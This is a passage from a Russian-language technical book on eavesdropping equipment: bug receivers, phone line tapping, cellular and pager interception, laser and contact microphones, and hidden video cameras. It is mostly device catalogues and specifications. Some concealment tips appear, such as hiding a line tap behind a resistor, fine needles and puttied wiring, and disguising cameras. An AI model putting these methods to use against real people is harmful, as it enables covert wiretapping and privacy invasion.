Как уже говорилось выше, дальность действия радиопередатчиков определяется в существенной степени качествами радиоприемных устройств, прежде всего, чувствительностью. В качестве приемников часто используют бытовые радиоприемные устройства. В этом случае предпочтительным является применение магнитол, т.к. появляется возможность одновременного ведения записи. К недостаткам таких устройств относятся низкая чувствительность и возможность настройки посторонних лиц на частоту передатчика. Частично эти недостатки можно устранить перестройкой частотного диапазона, в том числе с помощью конверторов, а также переналадкой усилителей для повышения чувствительности. Достоинством таких систем является низкая стоимость, а также то, что они не вызывают подозрений. Но все же предпочтительным следует считать применение специальных приемных устройств.
Технические данные некоторых приемников, предназначенных для работы с радиомикрофонами, приведены в табл. 1.2. В качестве примера одного из таких устройств на рис. 1.9 изображен портативный приемник АД-17-2. Диапазон частот составляет 360-400 МГц. Приемник осуществляет автоматическое скайнрование и захват сигнала передатчика. Автоматическая подстройка частоты осуществляется в режиме приема. Применяется АРУ промежуточной частоты и АРУ сигнала низкой частоты. Чувствительность - не хуже 2 мкВ. Электропитание - 6-10 В от элементов типа АА. Сопротивление антенного входа - 50 Ом. Потребление - 3 ма. Амплитуда сигнала на низкочастотном выходе - 0,5 В. Габариты - 147х70х38 мм.
В качестве примера стационарного современного приемника коротко опишем радиоприемник ICOM R7100. Это многофункциональный сканирующий приемник, расчитанный на диапазон частот от 25 до 2000 МГц. Имеет возможность приема радиосигналов с любыми видами модуляции, в том числе контроль телевизионных сигналов на выносной видеомонитор, а также режимы ручной и автоматической настройки и сканирования. 999 каналов памяти разделены на 9 групп, что дает возможность сканирования по заранее выбранным группам каналов/частот. Оборудован системой автоматического поиска и записи в память значений обнаруженных частот и встроенными часами для управления рожимами работы по программе.
Имеется возможность управления всеми режимами от компьютера с помощью специальных программ. Чувствительность - от 0,35 до 1,6 мкВ, в зависимости от диапазона. Шаг настройки - от 0,1 до 1000 Гц. Имеются разъемы для подключения магнитофона, монитора и т.д.
Таблица 1.2. Технические данные приемников, предназначенных для работы с радиомикрофонами
N модели |
Диапазон частот МгЦ |
Чувствит. , пpи с/ш20дБ, мкВ |
Пpогpамм. каналы |
Фиксиp. каналы |
Тип антенны |
Сканиp. и автопоиск |
Акустомат |
Тип питания |
Ток потpебл., мА |
Габаpиты, мм |
Вес, кГ |
2220 |
80-150 |
5 |
- |
- |
сетевой пpовод |
- |
- |
сеть 50-110 |
1.0 |
160x90x45 |
0.25 |
2240 |
25-550 800-1300 |
0.35 1.0 |
20 |
- |
Телескоп. внешний кабель |
+ |
+ |
батаpея сеть адаптеp |
60-700 |
470x390x130 |
8 |
2254 |
135-145 |
0.5 |
200 |
- |
всенапpавл |
- |
+ |
батаpея сеть адаптеp |
60-700 35ВА |
470x390x180 330х130х280 |
8 8.5 |
2270 |
0.09-34 34-60 114-174 423-450 |
0.5-3 |
200 |
- |
- |
+ |
- |
110/22012-16B |
|
||
2301 |
25-550 800-1300 |
0.35 1 |
20 |
- |
Телескоп. выносная |
+ |
- |
Адаптеp 12В |
500 |
80х138х200 |
1.2 |
2303 |
380-440 |
0.5 |
- |
2 |
встpоенная |
- |
- |
6В |
15-40 |
125х60х20 |
0.18 |
2307 |
26-29,99 60-88 115-178 210-260 410-520 |
0.7 1.5 |
16 |
- |
встpоенная |
+ |
- |
адапте p 6В |
120-170 |
185х80х37 |
0.47 |
2308 |
60-89 118-136 140-174 |
0.7 1.5 |
20 |
- |
встpоенная |
+ |
- |
Адаптеp 4В |
100 |
145х65х44 |
0.56 |
2309 |
20-1000 |
1 |
30 |
- |
активная пассивная |
+ |
- |
Батаpея адаптеp |
500-800 |
188х71х212 |
3 |
2310 |
20-1000 |
0.5 |
100 |
- |
- |
+ |
- |
110/220 батаpея |
60Вт |
433х132х465 |
15 |
1.3. Устройства перехвата телефонных сообщений
1.3.1. Основные методы прослушивания телефонных линий
Ценность информации, передаваемой по телефонным линиям , а также бытующее убеждение о массовом характере такого прослушивания вызывает наибольшее беспокойство у организаций и частных лиц за сохранение конфиденциальности своих переговоров именно по телефонным каналам. Для защиты своих секретов необходимо знать методы, с помощью которых могут быть осуществлены операции по перехвату. Но при этом нужно учесть, что организация массового прослушивания (в существовании которой убеждены очень многие) невозможна по причинам технического и финансового характера. В самом деле, для анализа записанных сообщений нужно держать огромное количество людей и техники. Как утверждает бывший глава КГБ В. Бакатин, 12 отдел КГБ прослушивал в Москве примерно 300 абонентов. Кроме того, для организации прослушивания в настоящее время требуется санкция прокуратуры. Более вероятна организация прослушивания без санкции, в коммерческих или других целях. По американским данным вероятность утечки информации по телефонным каналам составляет от 5 до 20%.
В настоящее время на рынке России представлены сотни типов устройств перехвата телефонных сообщений, как отечественных, так и импортных. Схема телефонной линии связи изображена на рис. 1.10.
Из этой схемы видно, что можно выделить шесть основных зон прослушивания:
Наиболее вероятна организация прослушивания первых трех зон, т.к. именно в этих зонах легче всего подключиться к телефонной лизди.
Специалисты, занимающиеся защитой информации, утверждают, что чаще всего используется прослушивание с помощью параллельного аппарата. В большинстве случаев для этого даже не требуется прокладывать дополнительные провода - телефонная сеть настолько запутана, что всегда есть неиспользуемые линии. Кроме того, нетрудно подключится в парадной к распределительной коробке.
Подключение в третьей зоне менее распространено, т.к. необходимо проникать в систему телефонных коммуникаций, состоящую из труб с проложенными внутри них кабелями, а также разобраться в этой системе и опдеделить нужную пару среди сотен других. Однако не следует считать, что это невыполнимая задача, поскольку существует уже необходимая для этого аппаратура. В качестве примера можно привести американскую систему "Крот". С помощью специального индуктивного датчика, охватывающего кабель, снимается передаваемая по нему информация. Для установки датчика на кабель используются колодцы, через которые проходит кабель. Датчик в колодце укрепляется на кабеле и для затруднения обнаружения проталкивается в подводящую трубу. Сигнал записывается на диск специального магнитофона. После заполнения диска выдается сигнал, и агент, при благоприятных условиях, заменяет диск. Аппарат может записывать информацию, передаваемую одновременно по 60 каналам. Продолжительность непрерывной записи составляет 115 часов. Такие устройства находили в Москве. Для различных типов подземных кабелей разработаны разные датчики: для симметричных высокочастотных - индуктивные для отвода энергии с коаксиальных кабелей, для кабелей с избыточным давлением - устройства, исключающие его снижение. Некоторые приборы снабжаются радиопередатчиком для передачи записанных сообщений или перехвата их в реальном масштабе времени.
1.3.2. Способы подключения телефонной линии и запись переговоров
В техническом плане самым простым способом является контактное подключение. Возможно временное подключение к абонентской проводке с помощью стандартной "монтерской трубки". Однако подключение такого типа легко обнаруживается с помощью простейших средств контроля напряжения телефонной сети. Уменьшить эффект падения напряжения можно путем подключением телефонной трубки через резистор сопротивлением 0,6-1 кОм. Подключение осуществляется с помощью очень тонких иголочек и тонких, покрытых лаком, проводов, прокладываемых в какой-либо существующей или изготовленной щели. Щель может быть зашпаклевана и покрашена так, что визуально определить подключение очень тяжело.
Более совершенным является подключение с помощью согласующего устройства (рис. 1.11).
Такой способ существенно меньше снижает напряжение в телефонной сети и затрудняет обнаружение факта прослушивания. Известен способ подключения к линиям связи аппаратуры с компенсацией падения напряжения (рис. 1.12).
Существенными недостатками контактного способа подключения являются нарушение целостности проводов и влияние подключенного устройства на характеристики линий связи. В целях устранения этого недостатка применяется индуктивный датчик, выполненный в виде трансформатора. Один из таких датчиков изображен на рис. 1.13.
Существуют также датчики, принцип работы которых основан на эффекте Холла. В табл. 1.3 приведены характеристики датчиков адаптеров подключения к телефонной линии. Стоимость подобных устройств колеблется от 20 до 250 $. В качестве записывающих устройств применяются стандартные диктофоны, специальные миниатюрные, как уже упоминавшийся OLIMPUS L-400, а также стационарные многоканальные диктофоны, как, например, АД-25-1. Как правило, схема прослушивания организована так, что магнитофон включается при появлении сигнала в линии. В качестве примера миниатюрного магнитофона можно привести модель N2502, рекламируемую как магнитофон, который невозможно обнаружить с помощью современных детекторов записывающей техники. Этот магнитофон изображен на рис. 1.14.
В этом магнитофоне имеются гнезда для подключения внешнего микрофона, пульта дистанционного управления и головных телефонов.
Как правило, специальные многоканальные магнитофоны для записи телефонных переговоров используются в составе специальной аппаратуры для контроля особо режимных работ. В этом случае используются специальные приемы, позволяющие по ключевым словам прерывать или записывать телефонный разговор. Случаи коммерческого прослушивания на городских АТС крайне редки, так как это невозможно без наличия там "своего" человека из обслуживающего персонала.
Таблица 1.3. Адаптеры подключения к линии
Марка |
Габаpитные pазмеpы |
Питание |
Дополнительные функции |
ЛСТ-АД |
45х35х5 |
автономное |
Автоматическое вкл./выкл |
БД-1 |
- |
автономное |
Индуктивный датчик |
PRO-1213 |
95х58х25, 50х22х10 |
автономное 9В |
Эффект Холла |
UM-122 |
100х50х18 |
автономное 3В |
Контактная игла |
STG-4525 |
125х75х25 |
автономное 9В |
Индуктивный зон |
PK-135S |
16х35 |
не требуется |
Включение по голосу |
Однако нельзя исключать случаев такого прослушивания на имеющихся и организуемых на некоторых предприятиях местных АТС. Такое прослушивание может быть организовано с помощью имеющихся на рынках США, Германии и Японии специальных многоканальных магнитофонов, предназначенных для стационарной записи телефонных переговоров и рассчитанных на значительное (от 10 до 100) число каналов.
Технические характеристики некоторых из таких устройств приведены в табл. 1.4.
Таблица 1.4. Технические характеристики записывающих устройств
Модель |
Количество каналов |
Габаpитные pазмеpы,мм |
Вес, кг |
Вpемя записи |
Дополнительныефункции |
PK-115-S |
10 |
500х360х150 |
9.8 |
нет дан. |
автоматичаское включение, подключение принтера, привязка ко времени |
PK-100-55 |
1 10 50 100 |
209х1666х290 1100х550х380 110х890х660 7900х1890х600 |
2,9 60 220 430 |
4 10х4 50х4 100х4 |
Автоматическое включение. Подключение принтера. Привязка к дате и времени |
АД-25 |
8 |
480х350х190 |
16 |
нет дан. |
пpивязка ко вpемени дистанц. упpавление |
ТМ |
9 20 31 42 |
нет данных |
нет дан. |
До 1000 |
пpивязка к дате и вpемени видеоконтpоль |
CU-1 |
10 |
нет данных |
нет данных |
нет данных |
регистрация времени, даты, номера абонента, подсчет числа звонков |
1.3.3. Телефонные радиоретрансляторы
Телефонные радиоретрансляторы чрезвычайно популярны и представляют собой радиоудлинители для передачи телефонных разговоров по радиоканалу. Обобщенная структурная схема подобного устройства приведена на рис. 1.15.
Большинство телефонных закладок автоматически включаются при поднятии телефонной трубки и передают информацию на пункт перехвата и записи. Источником питания для радиопередатчика является, как правило, напряжение телефонной сети. Так как в данном случае не требуется ни батареек, ни встроенного микрофона, размеры ретранслятора могут быть очень небольшими. Недостатком подобных устройств является то, что они могут быть обнаружены по радиоизлучению. На рис. 1.16 и 1.17 показаны примеры подобных устройств.
Малогабаритный кварцевый передатчик AD-31 предназначен для контроля телефонной линии. Дальность дейтвия - до 300 м и более. Диапазон частот - 350-450 МГц. Имеет каналы А, В или С. Включается в разрыв телефонной линии. Габариты - 18х38х10 мм, вес - 15 г.
Компактный ЧМ передатчик FD-45-4 для контроля телефонной линии. Закамуфлирован в телефонную розетку. Дальность действия - до 150 м. Габаритные размеры - 22х16х12 мм. Вес - 210 г. Чтобы уменьшить возможность обнаружения радиоизлучения, применяют тот же способ, что и в случае с радиомикрофоном - уменьшают мощность излучения передатчика, установленного на телефонной линии. А в безопасном месте устанавливают более мощный ретранслятор, переизлучающий сигнал на другой частоте и в зашифрованном виде.
Следует учесть, что нельзя исключать возможность применения радиопередатчиков, использующих псевдошумовые сигналы и (или) работающих "под шумами". В этом случае обнаружение радиозакладок еще более усложняется.
Для маскировки телефонные радиоретрансляторы выпускаются в виде конденсаторов, фильтров, реле и других стандартных узлов элементов, входящих в состав телефонной аппаратуры. Существуют ретрансляторы, выполненные в виде микрофона телефонной трубки (например, модель CRISTAL фирмы Sipe). Подобные изделия весьма легко и быстро можно установить в интересующий телефонный аппарат.
Здесь нельзя не сказать, что очень часто не требуется проделывать даже и такие простые операции. Очень распространены телефонные аппараты с кнопочным номеронабиранием типа ТА-Т, ТА-12. Благодаря особенностям своей конструкции они переизлучают информацию на десятках частот СВ, КВ и УКВ диапазона на расстояние до 200 м. Еще более просто подслушать разговор, если используется телефон с радиоудлинителем, представляющим собой две радиостанции: одна смонтирована в трубке, другая - в самом телефонном аппарате. В этом случае нужно только настроить приемник на требуемую частоту.
Для подобных целей выпускаются и специальные разведывательные приемники. Например, приемник "Минипорт" фирмы "Роде и Шварц" с диапазоном частот 20-1000 МГц. Этот приемник имеет небольшие габариты (188х74х212), универсальное питание и встроенный процессор. Запоминающее устройство может хранить в памяти до 30 значений частот и осуществлять сканирование в заданном диапазоне с переменным шагом .
1.3.4. Системы прослушивания сообщений, передаваемых по сотовым, пейджинговым каналам и по факсу
Сотовой называется система связи, состоящая из некоторого количества ячеек, которые, связываясь между собой, образуют сеть, или соты. Каждая ячейка может работать с определенным количеством абонентов одновременно. Сотовые сети имеют возможность наращивания, а также могут стыковаться друг с другом. Радиус действия базовой сотовой станции составляет 5-15 км, а перехват сообщений в этом случае, может проводиться на расстоянии до 50 км. В качестве примера реализации подобной системы можно привести сотовые системы наблюдения Cellmate-10В и Cellscan. Cellmate-106 контролирует одновремейно до 10 телефонных номеров, т.е. одну ячейку сотовой связи. Имеется возможность программируемого перебора ячеек. Нужный разговор может определяться по голосу абонента или по содержанию разговора. Перехваченные однажды номера при желании переводятся программой в особый режим наблюдения. Встроенное запоминающее устройство запоминает последние параметры настройки. Запись начинается автоматически, когда объект наблюдения начинает пользоваться телефоном. Информация о номерах телефонов, параметрах настройки, идентификации по голосу считывается с цветного жидкокристаллического дисплея, так же определяются коды доступа. Система Cellscan, аналогична по функциям Cellulate-10В и также размещается в атташе-кейсе. Утверждается, что количество программируемых номеров не ограничено. В режиме сканирования на дисплей выводится информация о 895 каналах. Наблюдается вся телефонная система, и выбираются каналы, по которым происходят звонки. С помощью комплекта сотовых карт определяется район, в котором происходит подозрительный разговор, идентифицированный сканером по содержанию или голосу. Можно отключить каналы, которые вы не хотите осуществлять перехват. Используется доработанный сотовый телефон ОКI, который может применяться и вкачестве обычного сотового телефона. Вес системы - 9 кг.
Современные системы сотовой связи могут использовать различные системы кодирования и (или) перестройку частоты по случайному закону. Существуют и специальные комплекты радиоперехвата с возможностью анализа зашифрованных сообщений, например, Sigint/Commt Spektra фирмы Hollandes Signal, но подобная аппаратура очень дорога. В России разработаны и предлагаются программно-аппаратные системы перехвата пейджинговых сообщений. В состав подобной системы входят доработанный сканер (AR-ЗОООА, IC-7100 и др.), устройство преобразования, компьютер и специальное программное обеспечение. Система позволяет осуществлять прием и декодирование текстовых и цифровых сообщений, передаваемых в системе радиопейджинговой связи и сохранять все принятые сообщения (с датой и временем передачи) на жестком диске персонального компьютера. При этом может производиться фильтрация потока сообщений, выделение данных, адресованных конкретным абонентам. На рис. 1.18 представлен пример реализации подобного устройства.
Перехват факс-сообщений принципиально не отличается от перехвата телефонных сообщений.
В заключение приведем пример организации прослушивания Агенством национальной безопасности США, имеющим в 6 раз больше служащих, чем ЦРУ. Четыре тысячи сто двадцать мощных центров прослушивания на базах в Германии, Турции, Японии и т.д., а также на кораблях, подводных лодках, самолетах и спутниках собирают и анализируют почти всю информацию, передаваемую электронным способом, включая излучения систем сигнализации автомобилей, квартир и т.д.
1.3.5. Использование телефонной линии для прослушивания помещений
Схема устройства, предназначенного для прослушивания помещений с использованием телефонной линии, приведена на рис. 1.19.
Как видно из рисунка, телефонная линия используется не только для передачи телефонных сообщений, но и для прослушивания помещения. Чтобы включить подобное устройство, нужно набрать номер абонента. Первые два гудка "проглатываются" устройством, т.е. телефон не звонит. После этого необходимо положить трубку и через определенное время (30-60 секунд) позвонить снова. Только после этого система включается в режим прослушивания.
Подобным образом работают, например, устройства ST-01 ELSY, UM103. Цена таких устройств - от 15 (отечественные) до 250 $ (зарубежные). В качестве примера одного из таких устройств на рис. 1.20 изображено устройство БОКС-Т. Это устройство позволяет контролировать помещение из любой точки земного шара по телефону.
Для этого достаточно набрать номер телефона, где уже установлен прибор "Бокс-Т", и произвести включение микрофона. Для выключения достаточно положить телефонную трубку. Модель TS-20-1 позволяет дополнительно контролировать подключенные к ней датчики охранной сигнализации. Модель TS-10-T2 включается с помощью блока вызова. Электропитание всех моделей осуществляется от телефонной линии с напряжением 60 В. Блок вызова модели TS20-T2 питается напряжением 9 В от батареи типа "Крона".
Необходимо иметь в виду, что существуют так называемые "беззаходовые" системы передачи акустической информации по телефонным линиям, позволяющие прослушивать помещения без установки какого-либо дополнительного оборудования. Также используются недостатки конструкции телефонного аппарата: акустические колебания воздействуют на якорь звонка, который, колеблясь, вызывает появление в катушке микротоков, модулированных речью. ЭДС, наводимая в катушке, в этом случае может достигать нескольких милливольт. Дальность этой системы не превышает (из-за затухания) нескольких десятков метров. Прием осуществляется на качественный, малошумящий усилитель низкой частоты.
Второй вариант "беззаходовой" системы связан с реализацией эффекта "навязывания". Колебания частотой от 150 кГц и выше подаются на один провод телефонной линии, ко второму проводу подсоединяется приемник. Земля передатчика и приемника соединены между собой или с общей землей, например, водопроводной сетью (рис. 1.21).
Через элементы схемы телефонного аппарата высокочастотные колебания поступают на микрофон, даже если он отключен от сети, и модулируются речью. Детектор приемника выделяет речевую информацию. Из-за существенного затухания ВЧ сигнала в двухпроводной линии дальность также не превышает нескольких десятков метров (без ретранслятора).
1.4. Специальные устройства прослушивания
1.4.1. Направленные микрофоны
Обычные микрофоны способны регистрировать человеческую речь на расстоянии, не превышающем нескольких десятков метров. Для увеличения дистанции, на которой можно производить прослушивание, практикуют применение направленного микрофона. Другими словами, это устройство собирает звуки только с одного направления, т.е. обладает узкой диаграммой направленности. Такие устройства широко применяются не только в разведке, но и журналистами, охотниками, спасателями и т.д.
Можно выделить два основных типа направленных микрофонов:
Микрофон с параболическим отражателем
В микрофоне с параболическим отражателем собственно микрофон расположен в фокусе параболического отражателя звука. Направленный параболический микрофон с усилителем АD-9 концентрирует идущие звуки и усиливает их. Прост в обращении и настройке. В комплект входит микрофон, усилитель, кабель и головные телефоны. Электропитание - от батареи 9 В. Выпускаются несколькй моделей. Общим в конструкции всех этих микрофонов является наличие рукоятки пистолетного типа, параболического отражателя диаметром около 40 см и усилителя. Диапазон воспринимаемых частот составляет от 100-250 Гц до 15-18 кГц. Все микрофоны имеют автономное питание и имеют разъемы для подключения к магнитофону. Острая "игольчатая" диаграмма направленности позволяет при отсутствии помех контролировать человеческую речь на расстоянии до 1200 м. В реальных условиях (в условиях города) можно рассчитывать на дальность до 100 м.
Резонансный микрофон
Резонансный микрофон основан на использовании явления резонанса в металлических трубках разной длины. Например, в одной из модификаций такого микрофона используется набор из 37 трубок длиной от 1 до 92 см. Звуковые волны, приходящие к приемнику по осевому направлению, приходят к микрофону в одинаковой фазе, а с боковых направлений (по причине отличной скорости распространения звуковых волн в металле, а также разной длины трубок) - оказываются сдвинутыми по фазе. Так как подобные устройства на рынке практически не представлены, у авторов нет данных о преимуществах резонансных микрофонов.
С точки зрения скрытого контроля звука применение направленных микрофонов затруднено из-за зачастую неприемлемых их габаритов и источников акустических помех. Кроме того, для того, чтобы не быть прослушанным в автомобиле, достаточно просто поднять стекло.
1.4.2. Лазерные микрофоны
В том случае, если вы подняли стекло в автомобиле или закрыли форточку, может быть использован лазерный микрофон. Первые их образцы были приняты на вооружение американскими спецслужбами еще в 60-е годы. Структурная схема подобного устройства изображена на рис. 1.23.
В качестве примера рассмотрим лазерный микрофон НР-150 фирмы "Hewlett-Packard" с дальностью действия до 1000 м. Он сконструирован на основе гелий-неонового или полупроводникового лазера с длиной волны 0,63 мкм (т.е. в видимом диапазоне;современные устройства используют невидимый ИК диапазон).
Луч лазера, отраженный от стекла помещения, в котором ведутся переговоры, оказывается промодулированным звуковой частотой. Принятый фотоприемником отраженный луч детектируется, звук усиливается и записывается. Приемник и передатчик выполнены раздельно, имеется блок компенсации помех. Вся аппаратура размещена в кейсе и имеет автономное питание. Подобные системы имеют очень высокую стоимость (более 10 тыс.$) и, кроме того, требуют специального обучения персонала и использования компьютерной обработки речи для увеличения дальности.
Существует опытная отечественная система ЛСТ-ЛА2 с дальностью съема менее 100 м и достаточно скромной стоимостью. Следует отметить, что эффективность применения такой системы возрастает с уменьшением освещенности оперативного пространства.
1.4.3. Гидроакустические датчики
Звуковые волны распространяются в воде с очень небольшим затуханием. Гидроакустики ВМФ научились прослушивать шепот в подводных лодках, находящихся на глубине десятков метров. Этот же принцип можно применять, используя жидкость, находящуюся в системах водоснабжения и канализации. Такую информацию можно перехватывать в пределах здания, но радиус прослушивания будет очень сильно зависеть от уровня шумов, особенно в водопроводе.
Предпочтительнее использовать датчик, установленный в батарее отопления. Еще более эффективным будет использование гидроакустического передатчика, установленного в батарее прослушиваемого помещения.
Данных о применении в России подобных устройств в целях коммерческой разведки в настоящее время не имеется.
1.4.4. СВЧ и ИК передатчики
Для повышения скрытности в последние годы стали использовать инфракрасный канал. В качестве передатчика звука от микрофона используется полупроводниковый лазер. В качестве примера рассмотрим устройство ТRМ-1830. Дальность действия днем составляет 150 м, ночью - 400 м, время непрерывной работы - 20 часов. Габариты не превышают 26х22х20 мм. К недостаткам подобной системы можно отнести необходимость прямой видимости между передатчиком и приемником и влияние помех. Самое громкое дело с применением ИК канала - Уотергейт.
Повысить скрытность получения информации можно также с помощью использования канала СВЧ диапазона - более 10 ГГц. Передатчик, выполненный на диоде Ганца, может иметь очень небольшие габариты. В эксперименте, проведенном авторами, обеспечивалась дальность более 100 м. К преимуществам такой системы можно отнести отсутствие помех, простоту и отсутствие в настоящее время эффективных средств контроля. К недостаткам следует отнести необходимость прямой видимости, хотя и в меньшей степени, т.к. СВЧ сигнал может все-таки огибать небольшие препятствия и проходит (с ослаблением) сквозь тонкие диэлектрики, например, шторы на окнах. Данных о применении СВЧ канала в России у авторов не имеется.
1.4.5. Стетоскопы
Стетоскоп представлет собой вибродатчик, усилитель и головные телефоны. Схема применения стетоскопа приведена на рис. 1.24.
Вибродатчик специальной мастикой прикрепляется к стене, потолку и т.п. Размеры датчика, на примере устройства DTI, составляют 2.2х0.8 см, диапазон частот - ЗОО-ЗООО Гц, вес - 126 г, коэффициент усиления - 20000.
С помощью подобных устройств можно осуществлять прослушивание разговора через стены толщиной до 1 м. Стетоскоп может оснащаться проводом, радио или другим каналом передачи информации. Основным преимуществом стетоскопа можно считать трудность обнаружения, т.к. он может устанавливаться в соседних помещениях.
В качестве примера приведем два устройства - SIPE RS и SIPE ОРТО2000, отличающиеся каналом передачи. Микрофон-стетоскоп размером 2хЗ см обеспечивает прослушивание через стены толщиной до 50 см и оконные рамы с двойными стеклами. Мощность передатчика SIPE RS - 20 мВт, дальность - 250 м. Размеры передатчика составляют 44х32х14 мм, масса - 41 г, время непрерывной работы - 90 часов. ИК система SIPE ОРТО 2000 обеспечивает радиус действия 500 м и имеет широкую диаграмму направленности. Существуют стетоскопы, в которых чувствительный элемент, усилитель и радиопередатчик объединены в одном корпусе. Имеющий очень небольшие габариты, радиостетоскоп достаточно прикрепить с помощью специальной липкой массы к стене, полу или потолку в соседнем помещении. В качестве примера такого стетоскопа на рис. 1.25 изображен стетоскоп АД-50.
Этот компактный стетоскоп позволяет не только прослушивать разговоры через стены, оконные рамы, двери, но и передавать информацию по радиоканаду. Имеет высокую чувствительность и обеспечивает хорошую разборчивость речевого сигнала. Рабочая частота составляет 470 МГц. Дальность передачи - до 100 м. Время непрерывной работы - 24 ч, размеры - 40х23 мм Большинством специалистов прогнозируется постоянный рост случаев применения стетоскопов, что прежде всего объясняется удобством применения подобной техники, а также тем, что их чрезвычайно трудно обнаружить.
1.5. Системы и устройства видеоконтроля
1.5.1. Общие сведения
Системы и устройства видеоконтроля получили мощный импульс своего развития в связи с созданием миниатюрных видеокамер и видеомагнитофонов. Если история применения фотокамер в разведке насчитывает 90-100 лет, то применение видеотехники сдерживалось неприемлемыми ее весогабаритными характеристиками. В настоящее время габаpиты видеокамер (без видеомагнитофонов) часто могут быть меньше самых миниатюрных фотокамер. Между тем, применение видеотехники в коммерческой разведке часто дает преимущества, недостижимые с помощью фото- и кинотехники. Прежде всего это то, что с помощью видеотехники легко осуществить запись, передачу на большие расстояния и оперативный анализ зрительной и звуковой информации в реальном масштабе времени.
Достижения миниатюризации в видеотехнике продемонстрированы на рис. 1.26.
Обобщенная структурная схема передающей части системы видеонаблюдения изображена на рис. 1.27.
В упрощенном виде система видеонаблюдения состоит из видеокамеры, видеомагнитофона и (или) передатчика.
1.5.2. Микровидеокамеры
Предлагаемые к реализации и имеющие приемлемые характеристики для целей коммерческой разведки видеокамеры имеют, в основном, импортное происхождение. Отечественные камеры по габаритным характеристикам пригодны пока только для систем видеоконтроля (служебные помещения, видеодомофоны, магазины и т.д.).
Остановимся более подробно на характеристиках некоторых конкретных моделей камер зарубежного производства. Наибольший интерес в данном случае представляет описание бескорпусных видеокамер. На рис. 1.28 изображена бескорпусная черно-белая микровидеокамера.
Объектив и электронная схема управления размещаются на одной плате размером 4.2х4.2 см. Стандартный объектив имеет фокусное расстояние 3,6 мм. С этим объективом камера имеет габариты 4.2х4.2х2.1 см и угол обзора 92°. С точечным объективом габариты составляют 4.2х4.2х1.2 см, угол обзора - 88°.
Независимо от типа объектива, камера имеет следующие характеристики: минимальная освещенность - 0,4 лк, разрешение - 380 линий, питание - 12 В, вес - 12 г.
На рис. 1.29 изображена цветная микровидеокамера VPC-715 (PAL).
Стандартный объектив имеет фокусное расстояние 5,6 мм, угол обзора 56°, разрешение: PAL - 512(H)x582(V). Камера может работать при освещенности до 2,5 лк. Габариты 4.2х8.4хЗ.0 см со стандартным и 4,2х8,4х1,2 см с точечным объективами. Вес - 30 г.
Эти и им подобные камеры могут монтироваться как вместе с объективом, так и с вынесенным объективом. Маскировка может быть самой различной: в розетках электропитания, радиоприемниках, настенных и настольных часах, одежде, очках, датчиках пожарной сигнализации, приборах освещения и т.д.
Мы не приводим рисунки этих видеокамер по той простой причине, что они по внешнему виду ничем не отличаются от обычных.
Видеокамеры могут снабжаться различными сменными объективами. Нужно иметь в виду, что некоторые материалы, применяемые для маскировки объектов (типа "черное стекло"), пропускают только небольшую часть спектра и могут успешно работать при солнечном освещении, при освещении ИК прожектором или обычными лампами накаливания, но их применение невозможно при освещении объекта люминесцентными или галогеновыми лампами.
Представляет интерес описание видеокамеры с передатчиком. Например, это может быть OVS-25-5, изображенная на рис. 1.30. Разрешение этой камеры - 380 линий. Чувствительность - 0,5 лк, объектив с фокусным расстоянием 1,6 мм и автоматической регулировкой диафрагмы. Встроенный передатчик работает в диапазоне 400-500 МГц и имеет мощность 40 мВт. Питание внешнее 12 В, потребляемый ток - 120 мА. Габариты - 3,8х4,5х5,9 см, вес - 120 гр.
1.5.3. Устройства дистанционного управления, видеодетектор движения
Устройство управления служит для наведения камеры на заданный объект, включения-выключения передатчика, видеомагнитофона, инфракрасного осветителя. В самом простом случае это устройство задает скорость и угол сканирования. В качестве примера на рис. 1.31 изображено поворотное устройство OVS-32, управление которым осуществляется с помощью выносного пульта.
Специальное поворотное устройство для видеокамер имеет следующие возможности:
Максимальная нагрузка - 7 кг, габаритные размеры - 146х124 мм, вес - 1,4 кг.
Для миниатюрных камер можно применить, например, устройство РТИ-II, имеющее габариты 6.5хЗ.3 см. Такое устройство изображено на рис. 1.32.
Миниатюрный прибор наведения применяется в помещении. Максимальная нагрузка - не более одного фунта. Предназначен для использования с камерами типа Watec, имеет цилиндрический корпус, угол горизонтального вращения - 350°, скорость вращения регулируется. Угол наклона - 180°, скорость также регулируется. Напряжение питания - 12 В постоянного тока (60 мА).
Более сложные устройства дистанционного управления имеют функции дистанционного включения (например, через нормально-разомкнутое реле). Включение может осуществляться посредством таймера, выключателя беспроводного активатора (например, с использованием радиоканала), дверных контактов, а также детектора движения. В качестве примера такого управляющего устройства можно привести изделие N 92444 производства США. Процессор данного устройства программируется в режиме таймера, ручного управления или дежурном режиме. Имеет генератор времени и даты для фиксации момента совершения записи происшествия, а также позволяет запрограммировать титры из двух строк по 20 знаков. Габариты - 14х18х4 см.
Видеодетектор движения служит для активизации аппаратуры при изменении положения на наблюдаемом объекте.
В качестве примера такого устройства опишем модель N 94501. Этот детектор имеет регулируемую чувствительность, исключает ложные срабатывания при изменении освещенности, возможна автоматическая настройка. Размер изображения регулируется от 5 до 90% от объекта наблюдения, имеется выход для подачи сигнала тревоги.
1.5.4. Инфракрасные осветители
Применение ИК осветителей бывает необходимо при работе в условиях недостаточной видимости, а также в том случае, если для маскировки объектива видеокамеры применены непрозрачные в видимом диапазоне материалы. Инфракрасные осветители могут выпускаться либо отдельно, либо совмещенными с видеокамерами. В качестве примера совмещенного с камерой ИК осветителя можно привести изделие фирмы SANYO - VDC-9212. Эта черно-белая видеокамера может работать в полной темноте. Разрешение - 400 линий, габариты - 10х5 см. Отдельно выполненный ИК осветитель N 91101, использует излучающий элемент на основе галиево-алюминиевого арсенида (GaALAs) со спектром излучения в районе 880 нм, помещенный в алюминиевый корпус. Потребляемый ток - 600 мА. Габариты - 10х5х4.5 см.
1.5.5. Миниатюрные видеомагнитофоны
Самым распространенным режимом видеонаблюдения является режим с одновременной записью на видеомагнитофон. Наиболее широка для этих целей применяются видеомагнитофоны, рассчитанные на работу с 8 мм видеокассетой. Видеомагнитофоны имеют, как правило, функцию дистанционного управления, звук записывается в режиме стерео.
Некоторые модели снабжены видеомонитором. Приведем характеристики некоторых моделей таких видеомагнитофонов. OVS-9 имеет две скорости записи, время записи - до 5 часов. Питание осуществляется от встроенного аккумулятора или внешнего источника питания напряжением 7,5 В. Потребляемая мощность - 4 Вт, габариты - 148х130х62 мм, вес - 670г(рис.1.33).
Модель OVS-9-1 (рис. 1.34) представляет собой видеомагнитофон OVS-9 со встроенным цветным плоским монитором. Монитор удобен при монтаже и настройке скрытых видеокамер, а также для контроля действующих видеосистем и просмотра снятого видеоматериала. Габариты - 150х135х70 мм, вес - 700 г.
1.5.6. Беспроводные линии передачи и приема видеоинформации
Обобщенная схема беспроводной линии передачи и приема видеоинформации представлена на рис. 1.35.
